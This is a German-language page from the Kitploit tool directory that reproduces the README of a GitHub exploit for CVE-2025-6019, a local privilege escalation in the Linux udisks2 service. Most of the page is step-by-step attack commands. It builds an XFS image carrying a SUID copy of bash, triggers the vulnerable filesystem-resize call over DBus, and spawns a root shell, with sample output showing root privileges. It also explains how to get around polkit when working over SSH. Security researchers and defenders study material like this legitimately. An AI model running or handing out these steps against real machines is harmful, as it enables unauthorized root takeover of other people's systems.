Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6019-exploit — Exploit | Kitploit
Tools/GitHubGitHub/and-oss/cve-2025-6019-exploit
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHuband-oss/cve-2025-6019-exploit

CVE-2025-6019-exploit

Exploit

Repository anzeigen
43vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-6019: Privilege-Eskalations-Exploit über UDisks2-Dateisystemvergrößerung

Details zur Schwachstelle

  • CVE-ID: CVE-2025-6019
  • Auswirkung: Lokale Privilegienausweitung (LPE)
  • Betroffene Systeme: Linux-Systeme mit anfälligen udisks2-Versionen
  • Mechanismus: Race-Condition während der Dateisystemvergrößerung ermöglicht Zugriff auf SUID-Binärdateien in weltweit beschreibbaren temporären Verzeichnissen
  • Schlüsselkomponenten:
    • udisks2-Dienst (DBus-Schnittstelle)
    • org.freedesktop.UDisks2.Filesystem.Resize-Methode
    • Temporäre Einhängepunkte unter /tmp/blockdev*

Exploit-Ablauf

1. Schädliches Dateisystem-Image erstellen (Angreifer)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # SUID-Bit setzen
umount ./xfs.mount 

2. Exploit auslösen (Zielmaschine)

root@kitploit:~
# Systemfähigkeiten prüfen
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# Störende Prozesse beenden
killall -KILL gvfs-udisks2-volume-monitor

# Loop-Gerät einrichten
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# Hintergrundüberwachung (wird ausgeführt, wenn SUID-Binärdatei erscheint)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# Schwachstelle über DBus auslösen
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

3. Root-Zugriff erlangen

root@kitploit:~
/tmp/blockdev*/bash -p  # Privilegierte Shell starten
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)

Wichtig!

Exploit funktioniert nur in logind-Sitzungen!

  • Das Skript muss von einer logind-Sitzung gestartet werden, die Active=yes und Remote=no ist (z. B. tty1).
  • Wird es von einer SSH-/pts/*-/Reverse-Shell-Sitzung gestartet, wird der udisksctl loop-setup --no-user-interaction-Aufruf von polkit verweigert, sodass der PoC mit „Failed to create loop device“ abbricht.

Hinweis:

  • Wenn Sie den Exploit über SSH verwenden möchten, müssen Sie eine temporäre polkit-Regel ablegen.

So verwenden Sie den Exploit

SUID-Image erstellen

root@kitploit:~
$ sudo bash exploit.sh create 

System ausnutzen

root@kitploit:~
$ bash exploit.sh exploit 

POC-Video

poc

Tool herunterladen